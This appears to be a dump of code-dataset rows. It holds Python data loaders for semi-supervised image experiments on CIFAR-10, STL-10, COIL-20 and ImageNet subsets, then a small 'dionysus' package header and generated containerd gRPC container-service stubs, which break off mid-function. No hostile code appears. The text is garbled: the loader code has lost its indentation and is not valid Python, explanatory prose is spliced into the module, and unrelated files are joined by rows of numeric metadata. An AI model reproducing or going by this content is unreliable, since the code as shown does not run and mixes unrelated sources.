dev_set = CIFAR10('cifar', train=False, download=True, transform=transform)
indices = np.arange(len(training_set))
labels = np.array([training_set[i][1] for i in indices], dtype=np.int64)
dev_indices = np.arange(len(dev_set))
if config.num_label != 10:
assert hasattr(config, 'allowed_label') and config.allowed_label != "", "No allowed_label"
# dev
dev_labels = np.array([dev_set[i][1] for i in dev_indices], dtype=np.int64)
mask3 = np.zeros(dev_indices.shape[0], dtype=bool)
mask2 = np.zeros(indices.shape[0], dtype=bool)
lbl_range = config.allowed_label.split(",")
lbl_range = [int(i) for i in lbl_range]
for i in lbl_range:
mask2[np.where(labels == i)[0][:]] = True
mask3[np.where(dev_labels == i)[0][:]] = True
indices = indices[mask2]
dev_indices = dev_indices[mask3]
unlabeled_loader = DataLoader(config, training_set, indices, config.train_batch_size_2)
dev_loader = DataLoader(config, dev_set, dev_indices, config.dev_batch_size)
ind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.lind.npy'.format(config.dataset, config.suffix))
if lab_ind and os.path.exists(ind_path):
labeled_indices = np.load(ind_path)
print("Find lab_ind!")
labeled_loader = DataLoader(config, training_set, labeled_indices, config.train_batch_size)
if config.num_label != 10:
# lbl: convert data_ind to unl_ind
mask = np.isin(indices, labeled_indices)
labeled_indices = np.arange(len(indices))
labeled_indices = labeled_indices[mask]
return unlabeled_loader, dev_loader, labeled_loader, labeled_indices
else:
print("no lab_ind!")
return unlabeled_loader, dev_loader
def get_cifar_loaders(config):
save_ind = True
tr_list = []
if hasattr(config, 'flip') and config.flip:
tr_list.append(transforms.RandomHorizontalFlip())
if hasattr(config, 'image_side') and config.image_side != 32: # resize
tr_list.append(transforms.Resize(config.image_side))
tr_list += [transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]
# tr_list += [transforms.ToTensor(), transforms.Normalize((0.53, 0.53, 0.52), (0.29, 0.29, 0.28))]
transform = transforms.Compose(tr_list)
tr_list = []
if hasattr(config, 'image_side') and config.image_side != 32: # resize
tr_list.append(transforms.Resize(config.image_side))
tr_list += [transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]
# tr_list += [transforms.ToTensor(), transforms.Normalize((0.53, 0.53, 0.52), (0.29, 0.29, 0.28))]
transform2 = transforms.Compose(tr_list)
training_set = CIFAR10('cifar', train=True, download=True, transform=transform)
dev_set = CIFAR10('cifar', train=False, download=True, transform=transform2)
indices = np.arange(len(training_set))
np.random.shuffle(indices)
mask = np.zeros(indices.shape[0], dtype=bool)
labels = np.array([training_set[i][1] for i in indices], dtype=np.int64)
dev_indices = np.arange(len(dev_set))
if config.num_label != 10:
assert hasattr(config, 'allowed_label') and config.allowed_label != "", "No allowed_label"
# dev
dev_labels = np.array([dev_set[i][1] for i in dev_indices], dtype=np.int64)
mask3 = np.zeros(dev_indices.shape[0], dtype=bool)
mask2 = np.zeros(indices.shape[0], dtype=bool)
lbl_range = config.allowed_label.split(",")
lbl_range = [int(i) for i in lbl_range]
for i in lbl_range:
mask[np.where(labels == i)[0][: config.size_labeled_data // config.num_label]] = True
mask2[np.where(labels == i)[0][:]] = True
mask3[np.where(dev_labels == i)[0][:]] = True
labeled_indices, unlabeled_indices = indices[mask], indices[mask2]
dev_indices = dev_indices[mask3]
ind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.lind.npy'.format(config.dataset, config.suffix))
if os.path.exists(ind_path) or \
(hasattr(config, "train_step") and config.train_step != 1): # try to load step 1 inds
assert os.path.exists(ind_path), "step {} Unknown label inds".format(config.train_step)
labeled_indices = np.load(ind_path)
print("Find lab_ind!")
save_ind = False
else:
lbl_range = range(10)
for i in lbl_range:
mask[np.where(labels == i)[0][: config.size_labeled_data // 10]] = True
labeled_indices, unlabeled_indices = indices[mask], indices
# labeled_indices, unlabeled_indices = indices[mask], indices[~ mask]
print('labeled size', labeled_indices.shape[0], 'unlabeled size', unlabeled_indices.shape[0], 'dev size', len(dev_set))
labeled_loader = DataLoader(config, training_set, labeled_indices, config.train_batch_size)
unlabeled_loader = DataLoader(config, training_set, unlabeled_indices, config.train_batch_size_2)
dev_loader = DataLoader(config, dev_set, dev_indices, config.dev_batch_size)
special_set = []
for i in range(10):
special_set.append(training_set[indices[np.where(labels == i)[0][0]]][0])
special_set = torch.stack(special_set)
# save label indices
ind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.lind.npy'.format(config.dataset, config.suffix))
if save_ind: # save step-1 / non-step inds
np.save(ind_path, labeled_indices)
return labeled_loader, unlabeled_loader, dev_loader, special_set
def get_stl10_loaders_test(config, lab_ind=True):
tr_list = []
if hasattr(config, 'image_side') and config.image_side != 96: # resize
tr_list.append(transforms.Resize(config.image_side))
tr_list += [transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]
# tr_list += [transforms.ToTensor(), transforms.Normalize((0.53, 0.53, 0.52), (0.29, 0.29, 0.28))]
transform = transforms.Compose(tr_list)
training_set = STL10(config.data_root, split='train+unlabeled', download=True, transform=transform)
dev_set = STL10(config.data_root, split='test', download=True, transform=transform)
indices = np.arange(len(training_set))
labels = np.array([training_set[i][1] for i in indices], dtype=np.int64)
dev_indices = np.arange(len(dev_set))
if config.num_label != 10:
assert hasattr(config, 'allowed_label') and config.allowed_label != "", "No allowed_label"
# dev
dev_labels = np.array([dev_set[i][1] for i in dev_indices], dtype=np.int64)
mask3 = np.zeros(dev_indices.shape[0], dtype=bool)
mask2 = np.zeros(indices.shape[0], dtype=bool)
lbl_range = config.allowed_label.split(",")
lbl_range = [int(i) for i in lbl_range]
for i in lbl_range:
mask2[np.where(labels == i)[0][:]] = True
mask3[np.where(dev_labels == i)[0][:]] = True
indices = indices[mask2]
dev_indices = dev_indices[mask3]
unlabeled_loader = DataLoader(config, training_set, indices, config.train_batch_size_2)
dev_loader = DataLoader(config, dev_set, dev_indices, config.dev_batch_size)
ind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.lind.npy'.format(config.dataset, config.suffix))
if lab_ind and os.path.exists(ind_path):
labeled_indices = np.load(ind_path)
print("Find lab_ind!")
labeled_loader = DataLoader(config, training_set, labeled_indices, config.train_batch_size)
if config.num_label != 10:
# lbl: convert data_ind to unl_ind
mask = np.isin(indices, labeled_indices)
labeled_indices = np.arange(len(indices))
labeled_indices = labeled_indices[mask]
return unlabeled_loader, dev_loader, labeled_loader, labeled_indices
else:
print("no lab_ind!")
return unlabeled_loader, dev_loader
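The `np.isin` step in the branch above converts absolute dataset indices (loaded from the `.lind.npy` file) into positions within the filtered `indices` array. A toy illustration with made-up values:

```python
import numpy as np

# Remap absolute dataset indices to positions within a filtered index array.
indices = np.array([3, 7, 9, 12])           # dataset indices kept by the class mask
labeled_absolute = np.array([7, 12])        # absolute indices loaded from disk
mask = np.isin(indices, labeled_absolute)   # [False, True, False, True]
positions = np.arange(len(indices))[mask]   # positions within `indices`
```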
def get_stl10_loaders(config): # n*3*96*96
save_ind = True
tr_list = []
if hasattr(config, 'flip') and config.flip:
tr_list.append(transforms.RandomHorizontalFlip())
if hasattr(config, 'image_side') and config.image_side != 96: # resize
tr_list.append(transforms.Resize(config.image_side))
tr_list += [transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]
# tr_list += [transforms.ToTensor(), transforms.Normalize((0.53, 0.53, 0.52), (0.29, 0.29, 0.28))]
transform = transforms.Compose(tr_list)
tr_list = []
if hasattr(config, 'image_side') and config.image_side != 96: # resize
tr_list.append(transforms.Resize(config.image_side))
tr_list += [transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]
# tr_list += [transforms.ToTensor(), transforms.Normalize((0.53, 0.53, 0.52), (0.29, 0.29, 0.28))]
transform2 = transforms.Compose(tr_list)
training_set = STL10(config.data_root, split='train+unlabeled', download=True, transform=transform)
dev_set = STL10(config.data_root, split='test', download=True, transform=transform2)
indices = np.arange(len(training_set))
np.random.shuffle(indices)
mask = np.zeros(indices.shape[0], dtype=bool)
labels = np.array([training_set[i][1] for i in indices], dtype=np.int64)
dev_indices = np.arange(len(dev_set))
if config.num_label != 10:
assert hasattr(config, 'allowed_label') and config.allowed_label != "", "No allowed_label"
# dev
dev_labels = np.array([dev_set[i][1] for i in dev_indices], dtype=np.int64)
mask3 = np.zeros(dev_indices.shape[0], dtype=bool)
mask2 = np.zeros(indices.shape[0], dtype=bool)
lbl_range = config.allowed_label.split(",")
lbl_range = [int(i) for i in lbl_range]
for i in lbl_range:
mask[np.where(labels == i)[0][: config.size_labeled_data // config.num_label]] = True  # integer per-class quota
mask2[np.where(labels == i)[0][:]] = True
mask3[np.where(dev_labels == i)[0][:]] = True
labeled_indices, unlabeled_indices = indices[mask], indices[mask2]
dev_indices = dev_indices[mask3]
ind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.lind.npy'.format(config.dataset, config.suffix))
if os.path.exists(ind_path) or \
(hasattr(config, "train_step") and config.train_step != 1): # try to load step 1 inds
assert os.path.exists(ind_path), "step {} Unknown label inds".format(config.train_step)
labeled_indices = np.load(ind_path)
print("Find lab_ind!")
save_ind = False
else:
lbl_range = range(10)
for i in lbl_range:
mask[np.where(labels == i)[0][: config.size_labeled_data // 10]] = True
labeled_indices, unlabeled_indices = indices[mask], indices
# labeled_indices, unlabeled_indices = indices[mask], indices[~ mask]
print('labeled size', labeled_indices.shape[0], 'unlabeled size', unlabeled_indices.shape[0], 'dev size', len(dev_set))
labeled_loader = DataLoader(config, training_set, labeled_indices, config.train_batch_size)
unlabeled_loader = DataLoader(config, training_set, unlabeled_indices, config.train_batch_size_2)
dev_loader = DataLoader(config, dev_set, dev_indices, config.dev_batch_size)
special_set = []
for i in range(10):
special_set.append(training_set[indices[np.where(labels == i)[0][0]]][0])
special_set = torch.stack(special_set)
# save label indices
ind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.lind.npy'.format(config.dataset, config.suffix))
if save_ind: # save step-1 / non-step inds
np.save(ind_path, labeled_indices)
return labeled_loader, unlabeled_loader, dev_loader, special_set
def get_coil20_loaders_test(config, lab_ind=True):
tr_list = []
tr_list += [transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]
# tr_list += [transforms.ToTensor(), transforms.Normalize((0.53, 0.53, 0.52), (0.29, 0.29, 0.28))]
transform = transforms.Compose(tr_list)
all_set = coil20(config.data_root, download=True, transform=transform, img_side=config.image_side)
num_data = len(all_set)
indices = np.arange(num_data)
labels = np.array([all_set[i][1] for i in indices], dtype=np.int64)
mask2 = np.zeros(indices.shape[0], dtype=bool)
if hasattr(config, 'allowed_label') and config.allowed_label != "":
lbl_range = config.allowed_label.split(",")
lbl_range = [int(i) for i in lbl_range]
for i in lbl_range:
mask2[np.where(labels == i)[0][:]] = True
indices = indices[mask2]
unlabeled_loader = DataLoader(config, all_set, indices, config.train_batch_size_2)
lind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.lind.npy'.format(config.dataset, config.suffix))
uind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.uind.npy'.format(config.dataset, config.suffix))
if lab_ind and os.path.exists(lind_path):
assert os.path.exists(uind_path), "uind does not exist"
labeled_indices = np.load(lind_path)
unlabeled_indices = np.load(uind_path)
print("Find lab_ind!")
labeled_loader = DataLoader(config, all_set, labeled_indices, config.train_batch_size)
unlabeled_loader = DataLoader(config, all_set, unlabeled_indices, config.train_batch_size)
# lbl: convert data_ind to unl_ind
mask = np.isin(indices, labeled_indices)
labeled_indices = np.arange(len(indices))
labeled_indices = labeled_indices[mask]
mask3 = np.isin(indices, unlabeled_indices)
mask3 = ~mask3
dev_indices = indices[mask3]
dev_loader = DataLoader(config, all_set, dev_indices, config.dev_batch_size)
return unlabeled_loader, dev_loader, labeled_loader, labeled_indices
else:
print("no lab_ind!")
return unlabeled_loader, unlabeled_loader
def get_coil20_loaders(config): # n*1*128*128
save_ind = True
tr_list = []
if hasattr(config, 'flip') and config.flip:
tr_list.append(transforms.RandomHorizontalFlip())
tr_list += [transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]
# tr_list += [transforms.ToTensor(), transforms.Normalize((0.53, 0.53, 0.52), (0.29, 0.29, 0.28))]
transform = transforms.Compose(tr_list)
all_set = coil20(config.data_root, download=True, transform=transform, img_side=config.image_side)
# dev ratio:1040/1440; lab ratio: 20/1440
# ref: https://github.com/csyanbin/Semi-supervised_Neural_Network/blob/master/utils/coil_data.py
num_data = len(all_set)
indices = np.arange(num_data)
np.random.shuffle(indices)
labels = np.array([all_set[i][1] for i in indices], dtype=np.int64)
assert hasattr(config,
'size_unlabeled_data') and config.size_unlabeled_data <= num_data, "size_unlabeled_data too large"
lind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.lind.npy'.format(config.dataset, config.suffix))
uind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.uind.npy'.format(config.dataset, config.suffix))
if os.path.exists(lind_path) or \
(hasattr(config, "train_step")
and config.train_step != 1): # try to load step 1 inds
assert os.path.exists(lind_path) and os.path.exists(uind_path), "step {} Unknown label inds".format(
config.train_step)
labeled_indices = np.load(lind_path)
unlabeled_indices = np.load(uind_path)
# dev data, part labels or not
mask3 = np.zeros(num_data, dtype=bool)
if hasattr(config, 'allowed_label') and config.allowed_label != "":
lbl_range = config.allowed_label.split(",")
lbl_range = [int(i) for i in lbl_range]
else:
lbl_range = range(20)
for i in lbl_range:
mask3[np.where(labels == i)[0][:]] = True
indices = indices[mask3]
mask3 = np.isin(indices, unlabeled_indices)
mask3 = ~mask3
dev_indices = indices[mask3]
print("Find lab_ind!")
save_ind = False
else:
mask = np.zeros(num_data, dtype=bool)
mask2 = np.zeros(num_data, dtype=bool)
mask3 = np.zeros(num_data, dtype=bool)
if hasattr(config, 'allowed_label') and config.allowed_label != "":
lbl_range = config.allowed_label.split(",")
lbl_range = [int(i) for i in lbl_range]
else:
lbl_range = range(20)
for i in lbl_range:
mask[np.where(labels == i)[0][: config.size_labeled_data // config.num_label]] = True
mask2[np.where(labels == i)[0][:config.size_unlabeled_data // config.num_label]] = True
mask3[np.where(labels == i)[0][config.size_unlabeled_data // config.num_label:]] = True
labeled_indices, unlabeled_indices = indices[mask], indices[mask2]
dev_indices = indices[mask3]
print('labeled size', labeled_indices.shape[0], 'unlabeled size', unlabeled_indices.shape[0],
'dev size', dev_indices.shape[0])
labeled_loader = DataLoader(config, all_set, labeled_indices, config.train_batch_size)
unlabeled_loader = DataLoader(config, all_set, unlabeled_indices, config.train_batch_size_2)
dev_loader = DataLoader(config, all_set, dev_indices, config.dev_batch_size)
special_set = []
for i in range(10):
special_set.append(all_set[indices[np.where(labels == i)[0][0]]][0])
special_set = torch.stack(special_set)
# save label indices
if save_ind: # save step-1 / non-step inds
np.save(lind_path, labeled_indices)
np.save(uind_path, unlabeled_indices)
return labeled_loader, unlabeled_loader, dev_loader, special_set
def get_imagenet10_loaders_test(config, lab_ind=True):
tr_list = []
tr_list += [transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]
# tr_list += [transforms.ToTensor(), transforms.Normalize((0.53, 0.53, 0.52), (0.29, 0.29, 0.28))]
transform = transforms.Compose(tr_list)
train_set = imagenet10(config.data_root, splitpart='train') # untested
test_set = imagenet10(config.data_root, splitpart='val') # untested
num_data = len(train_set)
indices = np.arange(num_data)
labels = np.array([train_set[i][1] for i in indices], dtype=np.int64)
mask2 = np.zeros(indices.shape[0], dtype=bool)
if hasattr(config, 'allowed_label') and config.allowed_label != "":
lbl_range = config.allowed_label.split(",")
lbl_range = [int(i) for i in lbl_range]
else:
lbl_range = np.arange(1000)
np.random.shuffle(lbl_range)
lbl_range = lbl_range[:config.num_label]
for i in lbl_range:
mask2[np.where(labels == i)[0][:]] = True
indices = indices[mask2]
unlabeled_loader = DataBatchLoader(config, train_set, indices, config.train_batch_size_2,
transform=transform, img_side=config.image_side)
lind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.lind.npy'.format(config.dataset, config.suffix))
uind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.uind.npy'.format(config.dataset, config.suffix))
tind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.tind.npy'.format(config.dataset, config.suffix))
if lab_ind and os.path.exists(lind_path):
assert os.path.exists(uind_path), "uind does not exist"
labeled_indices = np.load(lind_path)
unlabeled_indices = np.load(uind_path)
dev_indices = np.load(tind_path)
print("Find lab_ind!")
labeled_loader = DataBatchLoader(config, train_set, labeled_indices, config.train_batch_size,
transform=transform, img_side=config.image_side)
unlabeled_loader = DataBatchLoader(config, train_set, unlabeled_indices, config.train_batch_size,
transform=transform, img_side=config.image_side)
dev_loader = DataBatchLoader(config, test_set, dev_indices, config.dev_batch_size,
transform=transform, img_side=config.image_side)
return unlabeled_loader, dev_loader, labeled_loader, labeled_indices
else:
print("no lab_ind!")
return unlabeled_loader, unlabeled_loader
def get_imagenet10_loaders(config): # n*1*128*128
save_ind = True
tr_list = []
if hasattr(config, 'flip') and config.flip:
tr_list.append(transforms.RandomHorizontalFlip())
tr_list += [transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]
# tr_list += [transforms.ToTensor(), transforms.Normalize((0.53, 0.53, 0.52), (0.29, 0.29, 0.28))]
transform = transforms.Compose(tr_list)
train_set = imagenet10(config.data_root, splitpart='train') # untested
test_set = imagenet10(config.data_root, splitpart='val') # untested
# 1000 cls
# train: 1,281,167, val: 50,000, test: 100,000, but no cls on test
num_data = len(train_set)
num_data2 = len(test_set)
indices = np.arange(num_data)
indices2 = np.arange(num_data2)
np.random.shuffle(indices)
labels = np.array([train_set[i][1] for i in indices], dtype=np.int64)
labels2 = np.array([test_set[i][1] for i in indices2], dtype=np.int64)
lind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.lind.npy'.format(config.dataset, config.suffix))
uind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.uind.npy'.format(config.dataset, config.suffix))
tind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.tind.npy'.format(config.dataset, config.suffix))
if os.path.exists(lind_path) or \
(hasattr(config, "train_step")
and config.train_step != 1): # try to load step 1 inds
assert os.path.exists(lind_path) and os.path.exists(uind_path), "step {} Unknown label inds".format(
config.train_step)
labeled_indices = np.load(lind_path)
unlabeled_indices = np.load(uind_path)
dev_indices = np.load(tind_path)
print("Find lab_ind!")
save_ind = False
else:
mask = np.zeros(num_data, dtype=bool)
mask2 = np.zeros(num_data, dtype=bool)
mask3 = np.zeros(num_data2, dtype=bool)
if hasattr(config, 'allowed_label') and config.allowed_label != "":
lbl_range = config.allowed_label.split(",")
lbl_range = [int(i) for i in lbl_range]
else:
lbl_range = np.arange(1000)
np.random.shuffle(lbl_range)
lbl_range = lbl_range[:config.num_label]
# the amount in a class: [732, 1300]; there are less than 1300 images in 104 classes.
min_num = 1301
for i in lbl_range:
mask[np.where(labels == i)[0][: config.size_labeled_data // config.num_label]] = True
mask3[np.where(labels2 == i)[0][:]] = True
min_num = min(min_num, np.where(labels == i)[0].shape[0])
for i in lbl_range:
mask2[np.where(labels == i)[0][:min_num]] = True
labeled_indices, unlabeled_indices = indices[mask], indices[mask2]
dev_indices = indices2[mask3]
print('labeled size', labeled_indices.shape[0], 'unlabeled size', unlabeled_indices.shape[0],
'dev size', dev_indices.shape[0])
labeled_loader = DataBatchLoader(config, train_set, labeled_indices, config.train_batch_size,
transform=transform, img_side=config.image_side)
unlabeled_loader = DataBatchLoader(config, train_set, unlabeled_indices, config.train_batch_size_2,
transform=transform, img_side=config.image_side)
dev_loader = DataBatchLoader(config, test_set, dev_indices, config.dev_batch_size,
transform=transform, img_side=config.image_side)
special_set = []
# save label indices
if save_ind: # save step-1 / non-step inds
np.save(lind_path, labeled_indices)
np.save(uind_path, unlabeled_indices)
np.save(tind_path, dev_indices)
return labeled_loader, unlabeled_loader, dev_loader, special_set
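The `min_num` pass above balances the unlabeled pool by capping every class at the size of the smallest class (ImageNet classes range from 732 to 1300 images). A toy illustration of that balancing step, with made-up labels:

```python
import numpy as np

# Cap every class at the smallest per-class count before building the mask.
labels = np.array([0, 0, 0, 1, 1])
classes = (0, 1)
min_num = min(np.where(labels == c)[0].shape[0] for c in classes)  # smallest class size
mask = np.zeros(labels.shape[0], dtype=bool)
for c in classes:
    mask[np.where(labels == c)[0][:min_num]] = True
balanced = np.arange(labels.shape[0])[mask]
```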
def get_data_loaders_test(config):
dataset = config.dataset
if dataset == 'cifar':
return get_cifar_loaders_test(config)
elif dataset == 'stl10':
return get_stl10_loaders_test(config)
elif dataset == 'coil20':
return get_coil20_loaders_test(config)
elif dataset == 'imagenet10':
return get_imagenet10_loaders_test(config)
else:
print("dataset wrong: {}".format(dataset))
def get_data_loaders(config):
dataset = config.dataset
if dataset == 'cifar':
return get_cifar_loaders(config)
elif dataset == 'stl10':
return get_stl10_loaders(config)
elif dataset == 'coil20':
return get_coil20_loaders(config)
elif dataset == 'imagenet10':
return get_imagenet10_loaders(config)
else:
print("dataset wrong: {}".format(dataset))
| 43.862106 | 117 | 0.637721 | 5,482 | 40,397 | 4.516782 | 0.067858 | 0.005331 | 0.006664 | 0.008885 | 0.843746 | 0.830217 | 0.819111 | 0.803118 | 0.776463 | 0.766165 | 0 | 0.029029 | 0.235092 | 40,397 | 920 | 118 | 43.909783 | 0.772298 | 0.068718 | 0 | 0.725105 | 0 | 0.001403 | 0.045754 | 0.000862 | 0 | 0 | 0 | 0.001087 | 0.015428 | 0 | null | null | 0.001403 | 0.015428 | null | null | 0.032258 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
5d15b3b0a0bc337bc5ef4c187aa1e321b334d640 | 262 | py | Python | dionysus/__init__.py | Joshua3212/Dionysus | 2560a5afb7a00ad4ed8ead4c2aedf9b06b735195 | [
"MIT"
] | 1 | 2022-01-16T12:14:07.000Z | 2022-01-16T12:14:07.000Z | dionysus/__init__.py | Joshua3212/dionysus | 2560a5afb7a00ad4ed8ead4c2aedf9b06b735195 | [
"MIT"
] | null | null | null | dionysus/__init__.py | Joshua3212/dionysus | 2560a5afb7a00ad4ed8ead4c2aedf9b06b735195 | [
"MIT"
] | null | null | null | """
Tiny framework for interacting with redis pubsub and other protocols using custom adapters
"""
__version__ = "0.1.1"
__author__ = "Joshua3212"
__description__ = "Tiny framework for interacting with redis pubsub and other protocols using custom adapters" | 37.428571 | 110 | 0.782443 | 33 | 262 | 5.848485 | 0.575758 | 0.134715 | 0.165803 | 0.279793 | 0.80829 | 0.80829 | 0.80829 | 0.80829 | 0.80829 | 0.80829 | 0 | 0.031532 | 0.152672 | 262 | 7 | 110 | 37.428571 | 0.837838 | 0.343511 | 0 | 0 | 0 | 0 | 0.652174 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
5d22168b7320f128ab3e8ff92c557132f3281756 | 14,402 | py | Python | api_1.4/containerd/services/containers/v1/containers_pb2_grpc.py | englandbaron/pycontainerd | 9e5fea6e182a80508ce8b5725f407e50beba3cfe | [
"Apache-2.0"
] | null | null | null | api_1.4/containerd/services/containers/v1/containers_pb2_grpc.py | englandbaron/pycontainerd | 9e5fea6e182a80508ce8b5725f407e50beba3cfe | [
"Apache-2.0"
] | null | null | null | api_1.4/containerd/services/containers/v1/containers_pb2_grpc.py | englandbaron/pycontainerd | 9e5fea6e182a80508ce8b5725f407e50beba3cfe | [
"Apache-2.0"
] | null | null | null | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from containerd.services.containers.v1 import containers_pb2 as containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
class ContainersStub(object):
"""Containers provides metadata storage for containers used in the execution
service.
The objects here provide an state-independent view of containers for use in
management and resource pinning. From that perspective, containers do not
have a "state" but rather this is the set of resources that will be
considered in use by the container.
From the perspective of the execution service, these objects represent the
base parameters for creating a container process.
In general, when looking to add fields for this type, first ask yourself
whether or not the function of the field has to do with runtime execution or
is invariant of the runtime state of the container. If it has to do with
runtime, or changes as the "container" is started and stops, it probably
doesn't belong on this object.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Get = channel.unary_unary(
'/containerd.services.containers.v1.Containers/Get',
request_serializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.GetContainerRequest.SerializeToString,
response_deserializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.GetContainerResponse.FromString,
)
self.List = channel.unary_unary(
'/containerd.services.containers.v1.Containers/List',
request_serializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.ListContainersRequest.SerializeToString,
response_deserializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.ListContainersResponse.FromString,
)
self.ListStream = channel.unary_stream(
'/containerd.services.containers.v1.Containers/ListStream',
request_serializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.ListContainersRequest.SerializeToString,
response_deserializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.ListContainerMessage.FromString,
)
self.Create = channel.unary_unary(
'/containerd.services.containers.v1.Containers/Create',
request_serializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.CreateContainerRequest.SerializeToString,
response_deserializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.CreateContainerResponse.FromString,
)
self.Update = channel.unary_unary(
'/containerd.services.containers.v1.Containers/Update',
request_serializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.UpdateContainerRequest.SerializeToString,
response_deserializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.UpdateContainerResponse.FromString,
)
self.Delete = channel.unary_unary(
'/containerd.services.containers.v1.Containers/Delete',
request_serializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.DeleteContainerRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
class ContainersServicer(object):
"""Containers provides metadata storage for containers used in the execution
service.
The objects here provide an state-independent view of containers for use in
management and resource pinning. From that perspective, containers do not
have a "state" but rather this is the set of resources that will be
considered in use by the container.
From the perspective of the execution service, these objects represent the
base parameters for creating a container process.
In general, when looking to add fields for this type, first ask yourself
whether or not the function of the field has to do with runtime execution or
is invariant of the runtime state of the container. If it has to do with
runtime, or changes as the "container" is started and stops, it probably
doesn't belong on this object.
"""
def Get(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def List(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListStream(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Create(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Update(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Delete(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_ContainersServicer_to_server(servicer, server):
rpc_method_handlers = {
'Get': grpc.unary_unary_rpc_method_handler(
servicer.Get,
request_deserializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.GetContainerRequest.FromString,
response_serializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.GetContainerResponse.SerializeToString,
),
'List': grpc.unary_unary_rpc_method_handler(
servicer.List,
request_deserializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.ListContainersRequest.FromString,
response_serializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.ListContainersResponse.SerializeToString,
),
'ListStream': grpc.unary_stream_rpc_method_handler(
servicer.ListStream,
request_deserializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.ListContainersRequest.FromString,
response_serializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.ListContainerMessage.SerializeToString,
),
'Create': grpc.unary_unary_rpc_method_handler(
servicer.Create,
request_deserializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.CreateContainerRequest.FromString,
response_serializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.CreateContainerResponse.SerializeToString,
),
'Update': grpc.unary_unary_rpc_method_handler(
servicer.Update,
request_deserializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.UpdateContainerRequest.FromString,
